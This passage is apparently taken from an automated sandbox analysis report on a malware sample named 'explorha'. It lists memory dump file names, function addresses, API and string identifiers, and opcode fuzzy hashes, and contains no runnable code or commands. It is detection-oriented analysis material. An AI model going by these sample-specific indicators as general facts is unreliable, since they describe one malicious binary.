                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Xt$Xt
                                                                                                                                                                                                                                        • API String ID: 0-475810656
                                                                                                                                                                                                                                        • Opcode ID: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction ID: 46d1666ecafddbc1b3e160ed27bdb8499bb4b4570d2edfd9c1c932b231513696
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51F14C71E012199BDF14CFA8D8807AEBBF1FF89314F258269D819AB345D735AE01DB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00738829 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction ID: 50bdad8e34c835bb0765ae71663e6f2ed5228df12f95239f4e8e8a10f91fa281
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87012677A243252636552069BC066B717A99BC1BB4F2A003EFC44F72C3FFACDC425196
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00702DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 32384418-0
                                                                                                                                                                                                                                        • Opcode ID: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction ID: 7d773e6781a40ed6cfc29baadf67f964ef928868e095c97b246453030e31e832
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFA1E2B1A01216EFDB21DB68C94879AB7F8FF15354F004229E815D72C2EB38EA45CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070D6EE Relevance: 7.7, APIs: 5, Instructions: 235COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1418687624-0
                                                                                                                                                                                                                                        • Opcode ID: 6f864dcfbfb6004315650b756e26dea06dc27d81debf057e38e0a260bc52dac6
                                                                                                                                                                                                                                        • Instruction ID: eb69cd63b0ec9272230362474170fe2815710ab87ba7a3e82ac8c8fdbdfabbc0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f864dcfbfb6004315650b756e26dea06dc27d81debf057e38e0a260bc52dac6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C881C3B1A00315DBDB309F68CC49FAAB7E4EF08314F118369E919A72D1DB79AD44CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070DAEB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
